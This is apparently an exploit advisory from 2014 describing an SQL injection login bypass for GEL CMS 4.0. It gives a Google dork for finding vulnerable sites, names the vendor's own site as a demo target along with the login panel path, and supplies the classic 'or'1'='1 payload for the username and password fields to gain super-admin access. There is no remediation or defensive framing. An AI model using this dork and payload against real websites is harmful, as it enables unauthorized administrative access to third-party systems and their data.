ad8888888888ba           Bypass super-Admin GEL4.0
dP'         `"8b,
8  ,aaa,       "Y888a     ,aaaa,     ,aaa,  ,aa,
8  8' `8           "8baaaad""""baaaad""""baad""8b
8  8   8              """"      """"      ""    8b
8  8, ,8         ,aaaaaaaaaaaaaaaaaaaaaaaaddddd88P
8  `"""'       ,d8""
Yb,         ,ad8"
 "Y8888888888P"


# Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
# Google Dork: inurl:/contact-us_id7.php
# Date: 11 August 2014
# Exploit Author: Guillermo Garcia Marcos @GuilleSec
# Severity: High
# Vendor Homepage: http://www.oklahoma-website-design.com/
# Software Link: http://www.oklahoma-website-design.com/
# Versions: 4.00 and latest versions.
# Tested on: Debian (Apache+MySQL)

DEMO: http://www.oklahoma-website-design.com/login.php

Loginpanel:

           domain.lol/login.php

SQL string:

            Username: 'or'1'='1
            Password: 'or'1'='1